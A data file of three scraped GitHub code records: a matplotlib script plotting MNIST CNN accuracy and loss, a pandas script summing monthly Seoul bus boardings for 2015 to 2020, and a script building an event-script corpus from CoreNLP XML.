{"seq_id":"2597885845","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\n# Read csv into dataframe\ndf = pd.read_csv(\"results/model_results.csv\")\n\n# Accuracy graph\nplt.plot(df[\"train_accuracy\"], label = \"train accuracy\")\nplt.plot(df[\"test_accuracy\"], label = \"test accuracy\")\nplt.title(\"Model Accuracy\")\nplt.xlabel(\"Number of Epochs\")\nplt.ylabel(\"Accuracy\")\nplt.legend()\nplt.savefig(\"./graph/model_Accuracy.jpg\")\nplt.show()\n\n# Loss graph\nplt.plot(df[\"train_loss\"], label = \"train loss\")\nplt.plot(df[\"test_loss\"], label = \"test loss\")\nplt.title(\"Model Loss\")\nplt.xlabel(\"Number of Epochs\")\nplt.ylabel(\"Loss\")\nplt.legend()\nplt.savefig(\"./graph/model_Loss.jpg\")\nplt.show()","repo_name":"GeorgeLuDev/MNIST-CNN","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"}
{"seq_id":"8852948223","text":"# -*- coding:utf-8 -*-\r\nimport pandas as pd\r\nfrom pandas.core.frame import DataFrame\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.font_manager as fm\r\nimport numpy as np\r\n\r\nfontFile = \"C:\\\\windows\\\\Fonts\\\\malgun.ttf\"\r\nfontName = fm.FontProperties(fname = fontFile, size = 50).get_name()\r\nplt.rc(\"font\",family=fontName) \r\n\r\nfor ii in range(2015,2021):\r\n    df = pd.read_csv(\"D:/wodnd_file/buseoul%s.csv\"% ii,names=[\"년\",\"월\",\"일\",\"노선\",\"정류장\",\"탄\",\"내린\"])\r\n    \r\n    df2 = df[[\"월\",\"탄\"]]\r\n    \r\n    wc = {}\r\n    for i in range(1,13):\r\n        if i in wc:\r\n            pass\r\n        else:\r\n            wc[i] = df2[df2['월']==i]['탄'].sum()\r\n    \r\n    month,count = [],[]\r\n    \r\n    for i,v in wc.items():\r\n        month.append(i)\r\n        count.append(v)\r\n    \r\n    busDF = DataFrame()\r\n    busDF['월'] = month\r\n    busDF['탄'] = count\r\n    # print(busDF)\r\n    \r\n    busDF.to_csv(\"D:/wodnd_file/BusDF%s.csv\"% ii, index=False)\r\n    print(ii)\r\nprint(\"Done\")\r\nplt.bar(busDF['월'], busDF['탄'])\r\nplt.show()\r\ndf.to_csv(\"D:/wodnd_file/Rcorona.csv\",header=False, index=False)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"wodnd2990/corona_project","sub_path":"project_corona_real2/P06_busDF_Year.py","file_name":"P06_busDF_Year.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"}
{"seq_id":"35387498276","text":"import argparse\nfrom os import listdir\nfrom os.path import isfile, join\n\nfrom common.event_script import Script, ScriptCorpus\nfrom data.document_reader import read_corenlp_doc\nfrom utils import smart_file_handler\n\nif __name__ == '__main__':\n\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\n        'input_path', help='directory to CoreNLP parsed xml files')\n    parser.add_argument(\n        'output_path', help='path to write script corpus file')\n    parser.add_argument(\n        '-v', '--verbose', help='print all document names', action='store_true')\n\n    args = parser.parse_args()\n\n    input_files = sorted([\n        join(args.input_path, f) for f in listdir(args.input_path)\n        if 
isfile(join(args.input_path, f)) and f.endswith('xml.bz2')])\n\n script_corpus = ScriptCorpus()\n\n for input_f in input_files:\n doc = read_corenlp_doc(input_f, verbose=args.verbose)\n script = Script.from_doc(doc)\n if script.has_events():\n script_corpus.add_script(script)\n\n with smart_file_handler(args.output_path, 'w') as fout:\n fout.write(script_corpus.to_text())\n","repo_name":"pxch/event_imp_arg","sub_path":"scripts/generate_event_script.py","file_name":"generate_event_script.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"84"}
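An assumed invocation for the generate_event_script.py record above, based on its argparse definition; the paths are placeholders.

    # python generate_event_script.py /data/corenlp_xml /data/scripts.txt -v
    # reads every *.xml.bz2 file under the input directory, keeps only scripts
    # that contain events, and writes the corpus text to the output path.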